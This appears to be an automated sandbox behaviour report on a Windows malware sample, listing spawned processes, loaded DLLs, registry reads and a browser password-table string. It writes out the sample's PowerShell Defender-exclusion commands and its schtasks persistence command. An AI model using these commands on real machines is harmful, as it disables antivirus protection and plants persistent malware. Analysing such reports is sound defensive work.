Source: zE1VxVoZ3W.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: winver.exe, 00000015.00000003.2181779707.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000015.00000003.2184043264.0000000002B61000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000015.00000003.2181779707.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000015.00000002.4058013671.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000015.00000002.4058013671.0000000002B83000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: zE1VxVoZ3W.exe	Virustotal: Detection: 57%
Source: zE1VxVoZ3W.exe	ReversingLabs: Detection: 76%

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe

File read: C:\Users\user\Desktop\zE1VxVoZ3W.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\zE1VxVoZ3W.exe "C:\Users\user\Desktop\zE1VxVoZ3W.exe"
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zE1VxVoZ3W.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ydRhqlPsLsIczR" /XML "C:\Users\user\AppData\Local\Temp\tmp7D49.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process created: C:\Users\user\Desktop\zE1VxVoZ3W.exe "C:\Users\user\Desktop\zE1VxVoZ3W.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process created: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe "C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe"
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process created: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe "C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe"
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process created: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe "C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe"
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	Process created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"
Source: C:\Windows\SysWOW64\winver.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zE1VxVoZ3W.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ydRhqlPsLsIczR" /XML "C:\Users\user\AppData\Local\Temp\tmp7D49.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process created: C:\Users\user\Desktop\zE1VxVoZ3W.exe "C:\Users\user\Desktop\zE1VxVoZ3W.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ydRhqlPsLsIczR" /XML "C:\Users\user\AppData\Local\Temp\tmp99F9.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process created: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe "C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process created: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe "C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process created: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe "C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe"	Jump to behavior
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	Process created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	Section loaded: rasadhlp.dll

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
